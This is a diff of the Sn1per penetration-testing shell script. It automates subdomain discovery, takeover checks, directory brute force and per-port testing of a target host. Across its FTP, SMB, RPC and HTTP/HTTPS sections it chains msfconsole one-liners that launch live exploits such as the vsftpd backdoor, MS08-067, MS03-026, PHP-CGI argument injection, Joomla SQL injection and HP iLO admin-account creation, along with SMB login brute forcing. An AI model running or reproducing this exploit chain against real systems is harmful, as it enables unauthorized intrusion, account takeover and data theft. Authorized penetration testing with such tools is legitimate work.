for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
cd $INSTALL_DIR
if [ "$SUBOVER" = "1" ]; then
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/takeovers-$TARGET-subover.txt 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -1071,7 +1280,13 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-$TARGET-http.txt 2> /dev/null
curl --connect-timeout 3 --max-time 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-$TARGET-http.txt 2> /dev/null
if [ "$PASSIVE_SPIDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -1113,7 +1328,13 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-$TARGET-https.txt 2> /dev/null
curl --connect-timeout 3 --max-time 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-$TARGET-https.txt 2> /dev/null
if [ "$PASSIVE_SPIDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -1121,11 +1342,14 @@ if [ "$MODE" = "stealth" ]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
sslscan --no-failed $TARGET
if [ "$SSL" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET | tee $LOOT_DIR/web/sslyze-$TARGET.txt 2> /dev/null
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -1411,7 +1635,7 @@ echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[http://xerosecurity.com"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
echo -e "$RESET"
@ -1440,24 +1664,45 @@ if [ "$RECON" = "1" ]; then
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
if [ "$AMASS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
cut -d, -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt > $LOOT_DIR/domains/domains-$TARGET-amass-ips-sorted.txt
fi
if [ "$SUBFINDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS (THIS CAN TAKE A WHILE...) $RESET"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_DEFAULT -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-$TARGET-ips.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET | awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
if [ "$DNSCAN" = "1" ]; then
python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-$TARGET-ips.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET | awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
echo ""
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
echo ""
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
if [ "$CRTSH" = "1" ]; then
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
echo ""
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
fi
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/targets.txt >> /tmp/curl.out 2> /dev/null
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
@ -1468,7 +1713,16 @@ if [ "$RECON" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp' | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
cd $INSTALL_DIR
if [ "$SUBOVER" = "1" ]; then
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/takeovers-$TARGET-subover.txt 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR S3 PUBLIC BUCKETS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$CLOUDHUNTER" = "1" ]; then
cloudhunter -d $a | tee $LOOT_DIR/nmap/takeovers-$TARGET-aws.txt -v y 2>/dev/null
cloudhunter -w $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/takeovers-$TARGET-aws-all.txt -v y 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING EMAIL SECURITY $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -1536,6 +1790,7 @@ port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_110=`grep 'portid="110"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_111=`grep 'portid="111"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_135=`grep 'portid="135"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_137=`grep 'portid="137"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_139=`grep 'portid="139"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_162=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_389=`grep 'portid="389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@ -1590,7 +1845,7 @@ then
else
echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"
nmap -A -sV -Pn -sC -T5 -p 21 --script=ftp-* $TARGET
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; use auxiliary/scanner/ftp/ftp_version; run; use auxiliary/scanner/ftp/anonymous; run; use exploit/unix/ftp/vsftpd_234_backdoor; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
if [ -z "$port_22" ];
@ -1606,7 +1861,7 @@ else
fi
cd $INSTALL_DIR
nmap -A -sV -Pn -sC -T5 -p 22 --script=ssh-* $TARGET
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
msfconsole -x "setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use auxiliary/scanner/ssh/ssh_version; run; use scanner/ssh/ssh_enumusers; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
fi
if [ -z "$port_23" ];
@ -1685,7 +1940,7 @@ else
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http 2> /dev/null
whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http > $LOOT_DIR/web/whatweb-$TARGET-http.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
@ -1710,10 +1965,16 @@ else
fi
if [ "$MODE" = "web" ];
then
if [ "$PASSIVE_SPIDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_TOPLIST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
@ -1725,6 +1986,10 @@ else
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -1739,11 +2004,81 @@ else
echo ""
python $CMSMAP -t http://$TARGET/wordpress/
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
if [ "$NIKTO" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -1817,6 +2152,7 @@ then
echo -e "$OKRED + -- --=[Port 111 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 111 opened... running tests...$RESET"
msfconsole -q -x "use auxiliary/scanner/nfs/nfsmount; setg RHOSTS \"$TARGET\"; run; back;exit;"
showmount -a $TARGET
showmount -d $TARGET
showmount -e $TARGET
@ -1837,6 +2173,17 @@ else
echo -e "$OKORANGE + -- --=[Port 135 opened... running tests...$RESET"
rpcinfo -p $TARGET
nmap -A -p 135 -T5 --script=rpc* $TARGET
msfconsole -x "use exploit/windows/dcerpc/ms03_026_dcom; setg RHOST \"$TARGET\"; run; back; exit;"
fi
if [ -z "$port_137" ];
then
echo -e "$OKRED + -- --=[Port 137 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 137 opened... running tests...$RESET"
rpcinfo -p $TARGET
nmap -A -p 137 -T5 --script=broadcast-netbios-master-browser* $TARGET
msfconsole -q -x "use auxiliary/scanner/netbios/nbname; setg RHOSTS $TARGET; run; back;exit;"
fi
if [ -z "$port_139" ];
@ -1852,7 +2199,7 @@ else
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smb-protocols --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; use auxiliary/scanner/smb/smb_ms17_010; run; exit;"
fi
if [ -z "$port_161" ];
@ -1905,15 +2252,14 @@ else
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING HTTP HEADERS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
sslscan --no-failed $TARGET
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET | tee $LOOT_DIR/web/sslyze-$TARGET.txt 2> /dev/null
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
@ -1927,10 +2273,16 @@ else
if [ "$MODE" = "web" ];
then
if [ "$PASSIVE_SPIDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_TOPLIST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
@ -1942,6 +2294,10 @@ else
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -1955,11 +2311,86 @@ else
echo ""
python $CMSMAP -t https://$TARGET/wordpress/
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
if [ "$NIKTO" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 443; set SSL true; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
